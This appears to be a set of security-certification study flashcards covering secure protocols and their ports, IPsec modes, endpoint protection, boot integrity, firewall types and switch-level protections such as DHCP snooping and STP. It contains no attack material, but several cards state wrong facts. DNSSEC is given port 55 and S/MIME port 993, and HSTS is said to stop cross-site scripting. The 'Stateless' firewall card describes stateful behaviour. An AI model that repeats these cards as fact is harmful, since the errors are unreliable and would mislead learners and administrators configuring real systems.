Domain 3.0 Implementation
CASB: A Cloud Access Security Broker (CASB) is software that sits between the company and the cloud service provider (CSP). It is designed to enforce security policies, monitor traffic (checking that it is encrypted and does not contain anything malicious), and ensure that everything complies with the company's security policy.
(DNSSEC) Domain Name System Security Extensions (DNSSEC): used to secure DNS traffic. Protects against poisoning of the DNS server and cache; this is done by using digital signatures on the zone files. Uses both TCP and UDP; uses port 55.
(SSH) Secure Shell or Secure Socket Shell (SSH): used for secure remote access (Linux and Windows networks); uses port 22. Definition: a cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution. What is SSH used for? SSH provides a layer of security for information transfer between machines. Some important use cases for SSH are: Remote access (SSH ensures encrypted remote connections for users and processes); File transfers (SFTP, a secure file transfer protocol managed by SSH, provides a safe way to manipulate files over a network); X11 forwarding (users can run server-hosted X applications from their client machines); Port forwarding (by mapping a client's port to the server's remote ports, SSH helps secure other network protocols, such as TCP/IP); Tunneling (this encapsulation technique provides secure data transfers; tunneling is useful for accessing business-sensitive online materials from unsecured networks, as it can act as a handy VPN alternative); Network management (the SSH protocol manages network infrastructure and other parts of the system). Examples of SSH implementations: PuTTY (client for Windows and Linux), OpenSSH (for Unix and Linux), Tectia SSH (client and server for Windows, Unix and Linux), WinSCP (for Windows), ZOC.
(S/MIME) Secure/Multipurpose Internet Mail Extensions (S/MIME): used to secure emails by encrypting them and digitally signing them. Uses port 993 (just like IMAPS).
(SRTP) Secure Real-time Transport Protocol (SRTP): used for encryption, message authentication, and integrity for audio and video over IP networks. Uses port 5061 (shares port overlap with SIP).
(LDAPS) Lightweight Directory Access Protocol over SSL (LDAPS): used to secure directory services information (e.g. Active Directory Domain Services). Uses port 636.
(HTTPS) Hypertext Transfer Protocol over SSL/TLS (HTTPS): used for secure web browsing. Uses port 443.
(SFTP) SSH File Transfer Protocol (SFTP): a completely separate protocol from FTP (it is NOT compatible with FTP servers) that uses SSH to encrypt file transfers. Used for secure FTP-style downloads. Uses port 22.
(FTPS) File Transfer Protocol Secure (FTPS): used to download large files securely. Uses ports 989/990.
(SNMP v3) Simple Network Management Protocol version 3 (SNMPv3): used for remote monitoring and configuration of SNMP entities (such as network devices). Uses UDP ports 161/162.
Kerberos: an authentication protocol used by Windows to provide two-way (mutual) authentication using a system of tickets; used to secure authentication. Uses port 88.
(IPsec) Internet Protocol Security (IPsec): used to secure VPN sessions between two hosts. Uses UDP port 500.
(SMTPS) Simple Mail Transfer Protocol Secure (SMTPS): used to secure SMTP for email using Transport Layer Security (TLS). Intended to provide authentication of the communication partners. This is NOT a proprietary protocol nor an extension of SMTP: SMTPS uses TLS to give email a secure connection, whereas plain SMTP does not and is susceptible to attacks. Uses port 587.
(POP3S) Post Office Protocol Secure (POP3S) is the ENCRYPTED version of POP3, an application-layer Internet standard protocol used by e-mail clients to retrieve e-mail from a mail server; POP version 3 is the version in common use. Used to secure email. Uses port 995 (when encrypted). POP moves the message from the email server to the local computer, although there is usually an option in email clients to leave the messages on the email server as well. IMAP defaults to leaving the message on the email server, simply downloading a local copy. POP treats the mailbox as a single store and has no concept of folders, unlike IMAP.
(IMAPS) IMAP over SSL/TLS, or IMAP Secure (IMAPS): the Internet Message Access Protocol is an application-layer Internet protocol that allows an e-mail client to access email on a remote mail server. The current version is IMAP4. Uses port 993.
(SIP) Session Initiation Protocol (SIP): used for signaling and controlling Internet telephony for voice, video and messaging applications. SIP is used in Internet telephony, in private IP telephone systems, and in mobile phone calling over LTE (VoLTE). Ports: 5060/5061 (shares port commonality with SRTP).
IPsec Protocols: the Authentication Header (AH) protocol provides a mechanism for authentication only. It does NOT perform encryption, which makes it FASTER than ESP. The Encapsulating Security Payload (ESP) protocol provides data confidentiality (encryption) and authentication (data integrity, data origin authentication, and replay protection). ESP can be used with confidentiality only, authentication only, or both confidentiality and authentication.
IPsec Modes: 1. Tunnel: two IP headers are sent. The inner IP packet determines the IPsec policy that protects its contents. It is good for VPNs and gateway-to-gateway security, and useful for protecting traffic between different networks. An additional advantage of this mode is that it makes it very easy to establish a "tunnel" between two secure IPsec gateways. Tunnel mode protects internal routing information by encrypting the original packet's IP header and creating a new IP header on top of it. This allows tunnel mode to protect against traffic analysis, since attackers can only determine the tunnel endpoints. Tunnel mode is mandatory when one of the peers is a security gateway applying IPsec on behalf of another host; in other words, it is more compatible with existing gateways than transport mode. Tunnel mode makes it easier to traverse NATs. Both VPN clients and VPN gateways can use IPsec tunnel mode. Despite its advantages, tunnel mode has greater overhead and a smaller MTU than transport mode. 2. Transport: the IP addresses in the outer header are used to determine the IPsec policy that will be applied to the packet (it is good for ESP host-to-host traffic). Commonly used when fast and secure end-to-end communications are required, such as client-server communications (workstation-to-gateway and host-to-host scenarios). Reasons to use transport mode: it provides end-to-end security (authentication, integrity, and anti-replay protection); it has a larger MTU than tunnel mode; it has lower overhead than tunnel mode. Transport mode is not without its flaws: it has poor compatibility with security gateways, as well as greater difficulty in implementing NAT traversal. For this reason, transport mode can't be used in protected gateway-to-gateway configurations.
Tunnel (an IPsec mode): two IP headers are sent. The inner IP packet determines the IPsec policy that protects its contents. It is good for VPNs and gateway-to-gateway security. The entire original IP packet is encapsulated to become the "payload" of a new IP packet, and a new IP header is added on top of the original IP packet.
Transport (an IPsec mode): the IP addresses in the outer header are used to determine the IPsec policy that will be applied to the packet (it is good for ESP host-to-host traffic).
Authentication Header (AH) protocol (an IPsec protocol): provides a mechanism for authentication only. It does NOT perform encryption, which makes it FASTER than ESP.
Encapsulating Security Payload (ESP) protocol (an IPsec protocol): provides data confidentiality (encryption) and authentication (data integrity, data origin authentication, and replay protection). Can be used with confidentiality only, authentication only, or both confidentiality and authentication.
Securing voice and video: SRTP (Secure Real-time Transport Protocol, or Secure RTP) is how to secure VoIP protocols. SRTP uses AES encryption. For video only, you could use SSL; you could also use HTTP if using voice and video on a website. SIP is also used.
Time synchronization: uses NTP (Network Time Protocol), which synchronizes the clocks across the network. Use NTPsec (secure Network Time Protocol): development began in June 2015, and the code base was cleaned up to remove vulnerabilities.
Email and web protocols: use S/MIME; use secure SMTP, and IMAP or POP3 over SSL; if using email in a web browser, always use SSL/TLS (Transport Layer Security). TLS is the newer version of SSL and is the one commonly used. Use HTTPS (HTTP over TLS / HTTP over SSL), which uses public key encryption: A) a private key on the server; B) a symmetric session key transferred using asymmetric encryption; C) security and SPEED.
Secure file transfer: use FTPS (File Transfer Protocol Secure over SSL, aka FTP-SSL). This is unique because it uses SSL; it is NOT SFTP. Or use SFTP, which uses SSH for the File Transfer Protocol (it does not use SSL like FTPS) and provides file system functionality: it can resume interrupted transfers, get directory listings on a device, and allows remote file removal.
Directory services: use LDAP (Lightweight Directory Access Protocol), but preferably LDAPS (LDAP Secure over SSL). LDAP is a protocol for reading and writing directories over an IP network (it provides an organized set of records, like a phone directory). It is written using the X.500 specification/standard from the ITU (International Telecommunication Union, and they know directories!!). If you're using Microsoft Active Directory, Apple's Open Directory or OpenLDAP, then you're using a directory that can be accessed with this standardized protocol. Other methods of securing LDAP: SASL (Simple Authentication and Security Layer) provides authentication using many different methods (e.g. Kerberos or a client certificate).
Secure remote access: 1. Use SSH (Secure Socket Shell): encrypted terminal communication; replaces Telnet (and FTP); provides secure terminal communication and file transfer features. 2. Use IPsec: security at OSI Layer 3; authentication and encryption for every packet; provides confidentiality and integrity (encryption and packet signing); has been standardized (common to use); has two core IPsec protocols: Authentication Header (AH) and Encapsulating Security Payload (ESP).
Secure domain name resolution: use DNSSEC (Domain Name System Security Extensions). DNS had NO security in its original design, so it is relatively easy to poison. DNSSEC VALIDATES the DNS responses: it provides origin authentication and data integrity using public key cryptography; DNS records are signed and published in DNS.
Routing and switching: use SNMPv3 (Simple Network Management Protocol version 3), which gathers and collects router and switch information on your network. Provides confidentiality (encrypted data), integrity (no tampering with data), and authentication. Use version 3 because it is the version that provides encryption. You can also use SSH (Secure Shell) to provide encrypted terminal communication, and HTTPS, since it is becoming very common to configure routers through a web interface; encrypted communication is provided by HTTPS vs. HTTP.
Secure network address allocation: suggested you use NAT (Network Address Translation), and also secure DHCP. DHCP: ports 67/68 (UDP). To enhance DHCP security, additional security controls have been added OUTSIDE of DHCP; for example, in Active Directory (AD), DHCP servers must now be authorized. Many switches can be configured to use trusted certificates; if the switch sees DHCP traffic being sent from an untrusted interface, it can BLOCK that communication (called DHCP snooping on Cisco routers/switches). DHCP client DoS (starvation attack): an attacker changes/spoofs their MAC address to exhaust the DHCP server's pool of IP addresses, so no more IP addresses can be handed out to other devices. In response, switches can be configured to LIMIT the number of MAC addresses per interface, to prevent a DHCP DoS attack.
Subscription services: automated subscriptions, such as antivirus/antimalware software, may require continuous updates. Each subscription uses a different update method and communicates with different IPs. This may require us to examine each device individually to understand which protocol it uses, so that we can configure firewalls to ONLY allow updates from well-known, specific servers.
Antivirus: a software program designed to detect and destroy viruses and other malicious software on the system.
Anti-malware: a program that protects the system from all kinds of malware, including viruses, Trojans, worms, and potentially unwanted programs.
(EDR) Endpoint Detection & Response (EDR): an integrated endpoint security solution that continuously monitors the endpoint to mitigate malicious cyber threats.
DLP (Data Loss Prevention): a way to protect sensitive information and prevent its inadvertent disclosure. Can identify, monitor, and automatically protect sensitive information in documents. Protects personally identifiable information (PII), protected health information (PHI) and more (policies can typically be applied to email, SharePoint, cloud storage, and in some cases even databases).
(NGFW) Next-generation firewall (NGFW): a firewall (hardware or software) that combines conventional firewalling, deep-packet inspection (DPI), an intrusion prevention system (IPS), and an application-level firewall, moving beyond port/protocol inspection and blocking. It adds application-level inspection and intrusion prevention, and brings in intelligence from outside the firewall. The NGFW's goal is to include more layers of the OSI model in its monitoring.
(HIPS) Host-based intrusion prevention system (HIPS): analyzes whole packets, both header and payload, looking for known events. When a known event is detected, the packet is rejected. An IDS (intrusion detection system)/IPS (intrusion prevention system) in software form, installed on a host (often a server).
(HIDS) Host-based intrusion detection system (HIDS): analyzes whole packets, both header and payload, looking for known events. When a known event is detected, a log message is generated. An IDS/IPS in software form, installed on a host (often a server).
Host-based firewall: an application firewall that is built into desktop operating systems such as Windows or Linux. Because it is an application, it is in some respects more vulnerable to attack than a hardware firewall, so restricting service/process access to ensure malicious parties cannot stop or kill it is important. (Host-based and network-based firewalls are often used together in a LAYERED defense.)
Boot integrity: ensures hosts are protected during the boot process, so that all protections are in place when the system is fully operational. Attacks on our OS are constant, and the BOOT process is the perfect infection point. Note: rootkits can work at the kernel level to infect and take over the OS, giving them the same rights as the OS, so protecting the boot is important! Secure Boot, Trusted Boot, and Measured Boot are all different parts of the BOOT process and are considered a chain of trust.
Boot security / Unified Extensible Firmware Interface (UEFI): a modern version of the Basic Input/Output System (BIOS) that is more secure and is needed for a secure boot of the OS (the older BIOS cannot provide Secure Boot).
Measured Boot: all components, from the firmware to applications and software, are measured and the information is stored in a log file. The log file is stored on the Trusted Platform Module (TPM) chip on the motherboard. Microsoft definition: the Measured Boot feature provides antimalware software with a trusted (resistant to spoofing and tampering) log of all boot components. Antimalware software can use the log to determine whether components that ran before it are trustworthy or infected with malware. It can also send the Measured Boot logs to a remote server for evaluation. The remote server can start remediation actions by interacting with software on the client or through out-of-band mechanisms, as appropriate.
Boot attestation: attestation is accomplished when a device shows proof of its software integrity/configuration state using its boot configuration log (TCGLog). Forgery of a boot log is difficult. Why use this? Once malicious software/malware/rootkits infect a computer, they can eventually operate at the kernel level and thus effectively have full control of the operating system. This is why protecting every part of the boot process becomes so important. Attestation ensures that the operating system kernel has not been modified by any malware or rootkit; if there has been any change, the boot process will stop. The kernel of the operating system will then verify other parts of the OS, such as boot drivers and start-up files, and make sure that those components remain safe. It is important to secure the boot process to prevent the installation of malicious software.
TPM (for extra credit): at its most basic, the TPM is a tiny chip on your computer's motherboard, sometimes separate from the main CPU and memory. Microsoft definition: a Trusted Platform Module (TPM) is a microchip designed to provide basic security-related functions, primarily involving encryption keys. It is considered a tamper-proof, cryptographically secure auditing component with firmware supplied by a trusted third party. The TPM communicates with the rest of the system over a hardware bus. The boot configuration log contains hash-chained measurements recorded in its Platform Configuration Registers (PCRs) when the host last went through the bootstrapping sequence.
UEFI vs. BIOS (legacy): what's the difference? UEFI, created in 2006, is the newer replacement for legacy BIOS. UEFI supports hard drive sizes up to 9 zettabytes (1 zettabyte = one billion terabytes); BIOS only supports hard drives up to 2.2 terabytes. UEFI provides faster boot times and discrete driver support; BIOS only has the drive support stored in its ROM. UEFI provides more security! UEFI runs in 32-bit or 64-bit mode; BIOS only runs in 16-bit mode.
Tokenization (review): deemed more secure than encryption because it cannot be reversed. Takes sensitive data, such as a credit card number, and replaces it with random data. For example, many payment gateway providers store the credit card details securely and generate a random token. Tokenization can help companies meet PCI DSS and HIPAA compliance requirements.
Hashing (review): a database may contain a massive amount of data, and hashing is used to index and fetch items from it. This makes the search faster, as the hash key is shorter than the data. The hash function maps data to where the actual records are held.
Salting (review): salting passwords in a database adds random text before hashing, which delays/increases the compute time for a brute-force attack. It also renders rainbow tables ineffective.
Input validation: ensures that buffer overflow, integer overflow, and SQL injection attacks cannot be launched against applications and databases. Use it wherever data is entered, whether through a web page or a wizard. Only accept data in the correct format and within a range of minimum and maximum values. Note: incorrect formats should be rejected, forcing the user to re-enter.
Secure cookies: cookies are small packets of data stored in your web browser that contain information about your session. Cookies generally travel over HTTP (aka HTTP cookies) and can be stolen by attackers to carry out a session hijacking attack. Setting the Secure attribute flag in the website code ensures that cookies are only sent when there is a secure HTTPS session.
HTTP headers: Hypertext Transfer Protocol (HTTP) headers are designed to transfer information between the host and the web server. An attacker can carry out cross-site scripting (XSS), as it is mainly delivered by injecting HTTP response headers. This can be prevented by adding the HTTP Strict Transport Security (HSTS) header: HSTS ensures that the browser will ignore all HTTP connections.
Code signing: uses a certificate to digitally sign scripts and executables, to verify their authenticity and confirm that they are genuine.
Allow list: an allow list enables only explicitly allowed applications to run. This can be done by setting up an application whitelist. **Firewalls, IDS/IPS, and EDR systems have an allow list.**
Block list / deny list: prevents specified applications from being installed or run, by using a block/deny list in the specified security solution. **Firewalls, IDS/IPS, and EDR systems can have a block list.**
Secure coding practices: the developer who creates software writes code in a manner that ensures there are no bugs or flaws. The intent is to prevent attacks such as buffer overflow or integer injection.
Static code analysis: analysis where the code is not executed but is analyzed by a static code analyzer tool. The source code is run through the tool, which reports any flaws or weaknesses. Requires source code access.
Dynamic code analysis: the code is executed, and a technique called fuzzing is used to inject random input into the application. The output is reviewed to ensure appropriate handling of unexpected input. Exposes flaws in an application before it is rolled out to production. Does not require source code access.
Manual code review: the code is reviewed line by line to ensure that it is well written and error free. Tends to be tedious and time-consuming.
Fuzzing: a technique used to "test" applications, where random information is input into an application to see if the application crashes, memory leaks result, or error information is returned. Used to remedy potential problems within application code before a new application is released (white-box testing scenario). It can also be used to find vulnerabilities in the application after release; the weakness found is called improper input validation (black-box testing scenario).
Static Application Security Testing: analysis of computer software performed without actually executing programs. The tester has access to the underlying framework, design, and implementation. Tests "inside out"; requires source code.
Dynamic Application Security Testing: a program which communicates with a web application (executes the application). The tester has NO knowledge of the technologies or frameworks that the application is built on. Tests "outside in"; no source code required.
Open ports and services: listening ports should be restricted to those necessary, filtered to restrict traffic, and disabled entirely if unneeded (block through firewalls; disable by disabling the underlying service).
Registry: access should be restricted, and updates controlled through policy where possible. Always take a backup of the registry before you start making changes.
Disk encryption: drive encryption can prevent unwanted access to data in a variety of circumstances (using FDE or SED).
OS (operating system) hardening: OS hardening can often be implemented through security baselines such as updates/service packs, user accounts, network access and security (limit network access), antivirus, antimalware, etc. Can be applied through group policies or management tools (like MDM).
Patch management: aka "update management"; ensures that systems are kept up to date with current patches. Will evaluate, test, approve, and deploy patches. System audits verify the deployment of approved patches to systems. Patch both the native OS and third-party apps, and apply out-of-band updates promptly. Organizations without patch management will experience outages from known issues that could have been prevented. Third-party updates: such as applications, developer tools, and device drivers. Auto-update: not always the best option, as it may create problems with the OS or applications on that system. Emergency out-of-band updates: due to zero-day and important security concerns.
FDE: Full Disk Encryption (FDE) is built into the Windows operating system. BitLocker and FileVault are implementations of FDE. Keys are stored on the TPM.
SED: a Self-Encrypting Drive (SED) has encryption built into the hardware of the drive itself; anything written to that drive is automatically stored in encrypted form. Hardware-based full disk encryption; no OS software needed. A good SED should follow the Opal Storage Specification, the standard for SED storage.
Hardware root of trust: verifies that the keys match before the secure boot process takes place. When certificates are used in FDE, they use a hardware root of trust for key storage. A TPM is often used as the basis for a hardware root of trust; cryptographic keys are burned into the TPM. It protects against all types of attacks (brute-force attacks, malware, etc.) and checks for rootkits.
Sandboxing: the application is installed in a virtual machine environment isolated from our network. This enables us to patch, test, and ensure that it is secure before putting it into a production environment. It also facilitates investigating dangerous malware. In a Linux environment, this is known as a "chroot jail". In sandboxing, applications can NOT access unrelated resources; they play in their own sandbox. This is commonly used during the development phase. Also used in different deployments such as: virtual machines; mobile devices; browser iframes (inline frames); Windows User Account Control (UAC).
Trusted Platform Module (TPM): a chip that resides on the motherboard of the device. It is multi-purpose, e.g. storage and management of keys used for full disk encryption (FDE) solutions. Provides the operating system with access to keys, but prevents drive removal and data access. Burned-in cryptography; protects against brute-force attacks.
Jump servers: a remote admin workstation, typically placed on a screened subnet, aka perimeter network (DMZ), that allows admins to connect remotely to the network to perform admin activities.
Forward proxy (a type of proxy server): a server that controls outbound requests from users that seek resources on the external network.
Reverse proxy (a type of proxy server): placed on a screened subnet; performs the authentication and decryption of a secure session to enable it to filter the incoming traffic.
(NIDS) Network-based intrusion detection system (NIDS): analyzes whole packets, both header and payload, looking for known events. When a known event is detected, a log message is generated (and optionally an email notification). An IDS/IPS at the network level, often in hardware form.
Network-based intrusion prevention system (NIPS): analyzes whole packets, including both header and payload, looking for known events. When a known event is detected, the packet is rejected. Note: the difference with an IPS is that it TAKES ACTION, whereas an IDS just logs the data.
What is the difference between an IDS and an IPS? While both work at the network level, an IPS will TAKE ACTION by rejecting the packet, whereas an IDS just logs the threat and notifies you.
Types of IDS (intrusion detection systems) to know: A) heuristic/behavior; B) anomaly. Definition (for both): creates a baseline of activity to identify normal behavior and then measures system performance against the baseline to detect abnormal behavior.
Heuristic (IDS & IPS): a type of IDS (intrusion detection system) or IPS that uses AI to identify attacks that have no prior signature. Can detect previously UNKNOWN attack methods. Can detect emerging threats that haven't yet been defined or have NO signature.
Anomaly (IDS & IPS): a type of IDS (intrusion detection system) that creates a baseline of activity to identify normal behavior and then measures system performance against the baseline to detect abnormal behavior. Can detect previously UNKNOWN attack methods. Can detect emerging threats that haven't yet been defined in a signature.
Signature-based (IDS & IPS): aka "knowledge-based"; looks for a specific traffic flow pattern, and once traffic matches the signature it can be blocked. Uses signatures similar to the signature definitions you'd see in anti-malware/antivirus software. Only effective against KNOWN attack methods for which a signature is available.
Inline vs. passive NIDS/NIPS (modes of operation): Inline (aka in-band): the NIDS/NIPS is placed on or near the firewall as an additional layer of security. Passive mode (aka out-of-band): traffic does NOT go through the NIDS/NIPS device; sensors and collectors forward alerts to the NIDS.
Sensors & collectors: can be placed on a network to alert the NIDS of ANY changes in traffic patterns on the network. If you place a sensor on the Internet side of the network, it can potentially scan all of the traffic from the Internet side, which is valuable in detecting anomalous behavior.
Hardware Security Module (HSM): a physical computing device that safeguards and manages digital keys. It performs encryption and decryption functions for digital signatures, strong authentication, and other cryptographic functions. Like a TPM, but often removable or a type of external device, whereas a TPM is a chip on a motherboard.
Types of firewalls (to be reviewed in depth in the next flash cards): web application firewall (WAF); NGFW (next generation firewall); stateful; stateless; unified threat management (UTM); network address translation (NAT) gateway; content/URL filter; open-source vs. proprietary; hardware vs. software; appliance vs. host-based vs. virtual.
(WAF) Web application firewall (WAF): protects web applications by filtering and monitoring HTTP traffic between a web application and the Internet. Typically protects web applications from common attacks like XSS, CSRF, and SQL injection. Some come pre-configured with OWASP rule sets.
Next Generation Firewalls (NGFW): a "deep-packet inspection" firewall that moves beyond port/protocol inspection and blocking. Adds application-level inspection and intrusion prevention, and brings intelligence from outside the firewall.
Deep packet inspection: inspects and filters both the header and payload of a packet that is transmitted through an inspection point. Can detect protocol non-compliance, spam, viruses, and intrusions.
(UTM) Unified Threat Management (UTM): a multifunction device (MFD) composed of several security features in addition to a firewall; may include IDS, IPS, a TLS/SSL proxy, web filtering, QoS management, bandwidth throttling, NAT, VPN anchoring, and antivirus. More commonly found in small and medium businesses (SMB). Can be hardware or software.
Stateful (firewall): a type of firewall that filters and monitors network traffic, checking packets against a state table to determine whether they belong to an established connection. If not, it restricts or blocks the packets. The state table stores details about each connection based on source and destination IP addresses, port numbers or other static values, and relevant information. Its primary advantage is its ability to understand the context of each network connection. Not 'aware' of traffic patterns or data flows. Almost every firewall is considered a "stateful" firewall; we really don't have "stateless" firewalls. Operates at Layers 3 and 4 of the OSI model. Stateful firewalls have a "state table" that keeps track of ALL traffic going out and coming back in, and they enforce the TCP handshake; stateless firewalls can't do this. Typically faster and perform better under heavier traffic loads.
Stateless a type of Firewall that filters network traffic based on individual packets WITHOUT storing them. Does NOT use a state table. Can watch traffic streams from end to end. Examines packets based on: source & destination IP address, port numbers, protocols ==================== Are aware of communication paths and can implement various IP security functions such as tunnels and encryption. Better at identifying UNAUTHORIZED and forged communications.
(NAT) Gateway Network Address Translation (NAT) Gateway gateway that allows private subnets to communicate with public cloud services and the Internet, but automatically hides the internal network from Internet users. It does this by translating the private IP addresses into a single public IP address. The NAT gateway has the Network Access Control List (NACL) for the private subnets.
Content / URL Filter filter that looks at the traffic of the requested webpage and blocks the content based on the implemented filters. Used to block inappropriate content in the context of the situation.
Open-source vs. proprietary Firewalls Open Source: one in which the vendor makes the license freely available and allows access to the source code, though it might ask for an optional donation. There is no vendor support with open source, so you might pay a third party for support in a production environment (one of the more popular open-source firewalls is pfSense, the details for which can be found at https://www.pfsense.org/). Proprietary Firewalls: are more expensive but tend to provide more/better protection and more functionality and support (at a cost). Many vendors in this space, including Cisco, Check Point, Palo Alto, Barracuda - but “no source code access”
Open Source Firewall one in which the vendor makes the license freely available and allows access to the source code, though it might ask for an optional donation. There is no vendor support with open source, so you might pay a third party for support in a production environment (one of the more popular open-source firewalls is pfSense, the details for which can be found at https://www.pfsense.org/)
Proprietary Firewalls are more expensive but tend to provide more/better protection and more functionality and support (at a cost). Many vendors in this space, including Cisco, Check Point, Palo Alto, Barracuda - but “no source code access”
Hardware vs. Software Firewalls Hardware Firewalls: a piece of purpose-built network hardware. May offer more configurable support for LAN and WAN connections. Often has superior throughput vs software because it is hardware designed for the speeds and connections common to an enterprise network. Software Firewalls: software-based firewalls that you might install on your own hardware. Provide flexibility to place firewalls anywhere you’d like in your organization. On servers and workstations, you can run a host-based firewall. Note: Host-based (Software) Firewalls are more vulnerable in some respects as discussed earlier
Hardware Firewalls a piece of purpose-built network hardware. May offer more configurable support for LAN and WAN connections. Often has superior throughput vs software because it is hardware designed for the speeds and connections common to an enterprise network
Software Firewalls software-based firewalls that you might install on your own hardware. Provide flexibility to place firewalls anywhere you’d like in your organization. On servers and workstations, you can run a host-based firewall. Note: Host-based (Software) Firewalls are more vulnerable in some respects as discussed earlier
Appliance vs. host-based vs. Virtual Firewalls Appliance / Application Firewall: usually refers to a hardware (appliance) Firewall, typically catered specifically to application communications; often that is HTTP or web traffic. An example is a next generation firewall (NGFW). Host-Based: aka Software / an application installed on a host OS, such as Windows or Linux, both client and server operating systems. Virtual: in the cloud, firewalls are implemented as virtual network appliances (VNA). Available from both the CSP directly and third-party partners (commercial firewall vendors)
Appliance Firewall Appliance Firewall / Application Firewall: usually refers to a hardware (appliance) Firewall, typically catered specifically to application communications; often that is HTTP or web traffic. An example is a next generation firewall (NGFW)
Host-Based Firewall aka Software / an application installed on a host OS, such as Windows or Linux, both client and server operating systems
Virtual Firewall in the cloud, firewalls are implemented as virtual network appliances (VNA). Available from both the CSP directly and third-party partners (commercial firewall vendors)
(ACL) Access control list (ACL) a configuration built in to routers or firewalls that is used to allow or deny traffic. Configure an access control list on the ingress (inbound traffic) or egress (outbound traffic) of an interface - Found on Routers / Firewalls / Folders
Types of Network Devices Firewalls Firewalls are essential tools in managing and controlling network traffic. A firewall is a network device used to filter traffic. (Varies by type, but may filter at layers 3 through 7) Switch repeats traffic only out of the port on which the destination is known to exist. Switches offer greater efficiency for traffic delivery, create separate collision domains, and improve the overall throughput of data. (usually performs on layer 2, sometimes layer 3) Routers used to control traffic flow on networks and are often used to connect similar networks and control traffic flow between the two. They can function using statically defined routing tables, or they can employ a dynamic routing system. (layer 3) Gateways a gateway connects networks that are using different network protocols. Also known as protocol translators, can be stand-alone hardware devices or a software service. (network gateways work at layer 3.)
Firewalls (Network Device) Firewalls are essential tools in managing and controlling network traffic. A firewall is a network device used to filter traffic. (Varies by type, but may filter at layers 3 through 7)
Switch (Network Device) device that Repeats Network Traffic Only out of the Port on which the Destination is known to exist. Switches offer greater efficiency for traffic delivery, create separate collision domains, and improve the overall throughput of data. (usually performs on layer 2, sometimes layer 3)
Routers used to control traffic flow on networks and are often used to connect similar networks and control traffic flow between the two. They can function using statically defined routing tables, or they can employ a dynamic routing system. (use layer 3)
Gateways (Network Devices) a Gateway connects networks that are using different network protocols. Also known as protocol translators, can be stand-alone hardware devices or a software service. (Network Gateways Work At Layer 3.)
(QoS) Quality of Service (QoS) Ensures that applications have the bandwidth they need to operate. This is done by Prioritizing traffic based on importance and function. Traffic of real-time functions (like voice and video streaming) might be given greater priority. Priorities are human-configurable - this will be on the TEST, but will be asked in association with VOIP (Voice Over IP). - If asked about Voice and Data and which you prioritize for QoS for a VOIP system: - Prioritize the Voice Traffic coming into your Network over the network devices - QoS would be used to prioritize the particular bandwidth.
Implications of IPv6 Network security focus changes somewhat with IPv6 1. There are many more IPv6 addresses than IPv4. - This leads to difficulties with scanning so many ports - Because there are so many IP addresses available with IPv6, there is less need to perform port address translation (PAT) or outbound network address translation (NAT) on the network. This can simplify the communications process, but... 2. Network address translation (NAT) is itself a security feature, as it removes direct access to the source (user) in some use cases (like Internet browsing). With IPv6 we removed the Address Resolution Protocol (ARP), which brings us to the elimination of ARP poisoning. This does not imply IPv6 is any more or less secure than IPv4 - the attack vectors change.
Port spanning / Port mirroring Port mirroring (also known as port spanning) sends a copy of all data that arrives at a Port to another device / computer or sensor for investigation later or in near real-time
Port Taps passive component that allows non-intrusive access to data flowing across the network and enables monitoring of network links. A network tap uses passive optical splitting to transmit inline traffic to an attached monitoring device without data stream interference. The network tap has (at least) three ports: an A port, a B port, and a monitor port. A tap inserted between A and B passes all traffic (send and receive data streams) through unimpeded in real time, but also copies that same data to its monitor port, enabling a third party to listen. Network taps are commonly used for Network Intrusion Detection Systems (NIDS), VoIP recording, network probing, and other monitoring and collection devices and software that require access to a network segment
Monitoring services To help provide additional security on the network, some organizations employ a monitoring service -a group that monitors network security/activity. (Common with SIEM and SOAR functions (covered in 1.7)) Often an outsourced security operations center (SOC) function to provide 24x7 monitoring and alert or remediate issues after business hours. May also be helpful in maintaining compliance (HIPAA, GDPR, PCI DSS).
File integrity monitors Monitors and detects changes to files that should not be modified, automating notification (and potentially remediation). Commonly monitors files that would never change: things like your OS (operating system) files, where changes indicate some type of malicious activity! - can also be used to detect unwanted changes to baseline configurations
Route Security is basically routing security -- if you're routing information across a network you want ENCRYPTION (e.g. IPsec & SSL/TLS)
Broadcast Storm A Broadcast Storm (aka broadcast radiation) is the accumulation of broadcast and multicast traffic on a computer network. Extreme amounts of broadcast traffic constitute a "broadcast storm". It can consume sufficient network resources so as to render the network unable to transport normal traffic. This crashes the network. A packet that induces such a storm is occasionally nicknamed a Chernobyl packet
Broadcast Storm Prevention (part of Port Security) to prevent Broadcast Storms: - The Switch can control Broadcasts -- the software on the switch allows us to LIMIT the number of broadcasts per second. - Can also be used to Control Multicast and unknown Unicast traffic (Tight Security Posture) - Can also be Managed by Specific Values or by Percentage (or change over Normal Traffic Patterns)
Bridge Protocol Data Unit (BPDU) guard These are frames that contain information about the STP (Spanning Tree Protocol). (STP is a Layer 2 network protocol used to prevent looping within a network topology. STP was created to avoid the problems that arise when computers exchange data on a local area network (LAN) that contains redundant paths.) A BPDU Guard enables the STP (Spanning Tree Protocol) to stop such attempts.
Loop Prevention When 2 or more switches are joined together, they can create loops that create broadcast storms. (They'll send Traffic Back & Forth forever, which brings down the network. ) Spanning Tree Protocol (STP) prevents this from happening by forwarding, listening, or blocking on some ports.
(STP) Spanning Tree Protocol (STP) is a Layer 2 network protocol used to prevent looping within a network topology. STP was created to avoid the problems that arise when computers exchange data on a local area network (LAN) that contains redundant paths. - Very common way to implement Loop Control on any network - Can also detect Problems on the Network - Basic Configuration includes 3 parts: A) Root Port B) Designated Port C) Blocked Port
(DHCP snooping) (Dynamic Host Configuration Protocol snooping) a Layer 2 (the switch) security feature that prevents a rogue DHCP server from allocating IP addresses to a host on your network. - The Switch is a DHCP Firewall - Trusted: Routers, Switches, particular DHCP servers (you configure the Trusted Devices) - Untrusted (you can configure what devices or servers are Untrusted) - Switch watches for DHCP conversations
Media Access Control (MAC) filtering Media Access Control (the Hardware's Address) - Limits the access through the Physical Hardware Address - Allows you to create & configure a list of authorized wireless client interface MAC addresses - used by a wireless access point to block access to all non-authorized devices. - also factors in some Ethernet (wired) network scenarios. - MAC Filtering allows the administrator to allow / disallow Traffic based on the MAC address
Out-of-band management (OOB management) In systems management, out-of-band management (OOB; also lights-out management or LOM) is a process for accessing and managing devices and infrastructure at remote locations through a separate management plane from the production network. OOB allows a system administrator to monitor and manage servers and other network-attached equipment by remote control regardless of whether the machine is powered on or whether an OS is installed or functional.
